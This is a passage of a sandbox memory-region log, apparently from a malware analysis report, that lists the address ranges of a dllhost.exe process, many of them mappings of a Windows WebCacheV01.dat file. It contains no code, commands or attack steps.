"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3765 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 3766 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3767 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3768 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3769 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3770 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3771 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3772 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3773 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 3774 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 3775 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 3776 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 3777 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 3778 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3779 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3780 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3781 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 3782 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 3783 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 3784 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3785 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 3786 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 3787 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 3788 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 3789 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3790 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3791 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3792 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3793 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3794 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3795 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3796 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3797 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3798 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3799 start_va = 0xa40000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3800 start_va = 0xa50000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3801 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3802 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3803 start_va = 0xa80000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3804 start_va = 0xa90000 end_va = 0xa97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 3805 start_va = 0xaa0000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 3806 start_va = 0xba0000 end_va = 0xd27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 3807 start_va = 0xd30000 end_va = 0xeb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 3808 start_va = 0xec0000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 3809 start_va = 0x22c0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 3810 start_va = 0x23c0000 end_va = 0x23c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 3811 start_va = 0x23d0000 end_va = 0x23d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 3812 start_va = 0x23e0000 end_va = 0x23e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 3813 start_va = 0x23f0000 end_va = 0x23f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 3814 start_va = 0x2400000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 3815 start_va = 0x2490000 end_va = 0x2497fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3816 start_va = 0x24a0000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 3817 start_va = 0x24b0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3818 start_va = 0x24c0000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3819 start_va = 0x24d0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3820 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3821 start_va = 0x2500000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3822 start_va = 0x25b0000 end_va = 0x28e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3823 start_va = 0x28f0000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 3824 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 3825 start_va = 0x3920000 end_va = 0x392ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3826 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3827 start_va = 0x3960000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3828 start_va = 0x3970000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3829 start_va = 0x3980000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3830 start_va = 0x3990000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3831 start_va = 0x39d0000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3832 start_va = 0x39e0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3833 start_va = 0x39f0000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3834 start_va = 0x3a00000 end_va = 0x3a07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 3835 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3836 start_va = 0x3a30000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3837 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3838 start_va = 0x3a50000 end_va = 0x3a57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 3839 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3840 start_va = 0x3a80000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a80000" filename = "" Region: id = 3841 start_va = 0x3ae0000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3842 start_va = 0x3af0000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3843 start_va = 0x3b00000 end_va = 0x3b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3844 start_va = 0x3b10000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 3845 start_va = 0x3b20000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3846 start_va = 0x3b30000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3847 start_va = 0x3b40000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3848 start_va = 0x3b50000 end_va = 0x3b5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b50000" filename = "" Region: id = 3849 start_va = 0x3b60000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3850 start_va = 0x3b70000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3851 start_va = 0x3b80000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 3852 start_va = 0x3c80000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3853 start_va = 0x3ca0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3854 start_va = 0x3cb0000 end_va = 0x3daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 3855 start_va = 0x3db0000 end_va = 0x3eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 3856 start_va = 0x3fb0000 end_va = 0x40affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 3857 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3858 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3859 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3860 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3861 start_va = 0x7ff6b73d0000 end_va = 0x7ff6b73d6fff monitored = 0 entry_point = 0x7ff6b73d1570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 3862 start_va = 0x7ff8740d0000 end_va = 0x7ff87435dfff monitored = 0 entry_point = 0x7ff8741a0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3863 start_va = 0x7ff8769a0000 end_va = 0x7ff876c98fff monitored = 0 entry_point = 0x7ff876a67280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 3864 start_va = 0x7ff877bd0000 end_va = 0x7ff877be4fff monitored = 0 entry_point = 0x7ff877bd5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 3865 start_va = 0x7ff87bb00000 end_va = 0x7ff87be81fff monitored = 0 entry_point = 0x7ff87bb51220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3866 start_va = 0x7ff87fc60000 end_va = 0x7ff87fcf5fff monitored = 0 entry_point = 0x7ff87fc85570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3867 start_va = 0x7ff8807d0000 end_va = 0x7ff880800fff monitored = 0 entry_point = 0x7ff8807d7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3868 start_va = 0x7ff880a40000 end_va = 0x7ff880a5efff monitored = 0 entry_point = 0x7ff880a45d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3869 start_va = 0x7ff880d80000 end_va = 0x7ff880d8afff monitored = 0 entry_point = 0x7ff880d819a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3870 start_va = 0x7ff881170000 end_va = 0x7ff881198fff monitored = 0 entry_point = 0x7ff881184530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3871 start_va = 0x7ff8812e0000 end_va = 0x7ff88132afff monitored = 0 entry_point = 0x7ff8812e35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3872 start_va = 0x7ff881330000 end_va = 0x7ff88133efff monitored = 0 entry_point = 0x7ff881333210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3873 start_va = 0x7ff881340000 end_va = 0x7ff881353fff monitored = 0 entry_point = 0x7ff8813452e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3874 start_va = 0x7ff881370000 end_va = 0x7ff8813b2fff monitored = 